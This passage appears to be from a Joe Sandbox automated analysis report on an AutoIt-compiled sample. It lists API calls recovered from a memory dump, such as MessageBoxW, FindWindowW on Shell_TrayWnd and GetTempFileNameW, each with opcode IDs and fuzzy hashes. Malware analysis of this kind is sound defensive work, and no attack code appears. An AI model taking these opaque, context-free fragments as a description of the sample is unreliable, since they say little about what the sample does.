                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp
                                                                                                                • String ID: #32770
                                                                                                                • API String ID: 2292705959-463685578
                                                                                                                • Opcode ID: a3d400c417cc86b0e12fb5c8b1933745f4e21ff6b44fb76f159031ccaeba422b
                                                                                                                • Instruction ID: 50f7635fdbf2db7acf9e68f8bed414e18630533e02caac4558c058021d9f821b
                                                                                                                • Opcode Fuzzy Hash: a3d400c417cc86b0e12fb5c8b1933745f4e21ff6b44fb76f159031ccaeba422b
                                                                                                                • Instruction Fuzzy Hash: B2E0D8336003292BD720EAA69C0AFE7FBACFB51764F010026F964E3141E6B0964587F4
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00D7B36B
                                                                                                                  • Part of subcall function 00D62011: _doexit.LIBCMT ref: 00D6201B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message_doexit
                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                • Opcode ID: 7a8b19228dc547fb00cfd6c3b100373c9f9347b5f9564979bd4e3aabab5036e0
                                                                                                                • Instruction ID: 667e25b66e0ea36cb38cd93f01c964c6ead641434362f13d5b29aa4338f156cd
                                                                                                                • Opcode Fuzzy Hash: 7a8b19228dc547fb00cfd6c3b100373c9f9347b5f9564979bd4e3aabab5036e0
                                                                                                                • Instruction Fuzzy Hash: 90D012312C431837D21522D46C0BFD576888F15B55F054026BF4C962C29AD595C081B9
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 00DBBAB8
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00DBBCAB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryFreeLibrarySystem
                                                                                                                • String ID: WIN_XPe
                                                                                                                • API String ID: 510247158-3257408948
                                                                                                                • Opcode ID: 7109e6e9fa262898554855540f38b3cdfed151311ae20c48f91305737779f941
                                                                                                                • Instruction ID: 1990164098af5eb5d4ba2319d2094003b8c9072b4fd1fad183422120939b83d4
                                                                                                                • Opcode Fuzzy Hash: 7109e6e9fa262898554855540f38b3cdfed151311ae20c48f91305737779f941
                                                                                                                • Instruction Fuzzy Hash: EBE0C970C0420EEFCB25DBA9CC49AECB7B9BB08301F148496E562B2160C7B19A44DF35
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DA84DF
                                                                                                                • PostMessageW.USER32(00000000), ref: 00DA84E6
                                                                                                                  • Part of subcall function 00D88355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D883CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 64309be15245f323d49054bda17c9b81726b2bf20dcd062daa6f876af984a283
                                                                                                                • Instruction ID: 1f9d6d0071a0fc40c08c6e4731896ad740488211936c367d729f40c59a071cae
                                                                                                                • Opcode Fuzzy Hash: 64309be15245f323d49054bda17c9b81726b2bf20dcd062daa6f876af984a283
                                                                                                                • Instruction Fuzzy Hash: 1CD0C972384719BBE665A7709C4FFD67655AB18B11F060929734AEA2D0C9A0B804C774
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DA849F
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DA84B2
                                                                                                                  • Part of subcall function 00D88355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D883CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 9245de2fed7af6e79ab8378ab768b0936f161991b95c3d6659e8adaff3a01aa2
                                                                                                                • Instruction ID: a9afb47475bc02305bd8202678926cf938f6fbe79585a801ca4a8d207dbedcbb
                                                                                                                • Opcode Fuzzy Hash: 9245de2fed7af6e79ab8378ab768b0936f161991b95c3d6659e8adaff3a01aa2
                                                                                                                • Instruction Fuzzy Hash: 11D0C972384719BBE665A7709C4FFD67A55AB14B11F060929734AEA2D0C9A0B804C770
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00D8D01E
                                                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00D8D035
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                • String ID: aut
                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                • Opcode ID: 450c98d5319cfce203244dcf4d8471e080b3ecfdaa0d8ed9303dbb05193854a3
                                                                                                                • Instruction ID: 323569bf4d74df9ed86e6ee3509bea2203ecd1f77ef0eea29502b467d6d0ab9f
                                                                                                                • Opcode Fuzzy Hash: 450c98d5319cfce203244dcf4d8471e080b3ecfdaa0d8ed9303dbb05193854a3
                                                                                                                • Instruction Fuzzy Hash: 57D05EB154030FBBDB10ABA0ED0EFA9BB6CA700704F1041A07714D50D1D2F0D6498BB4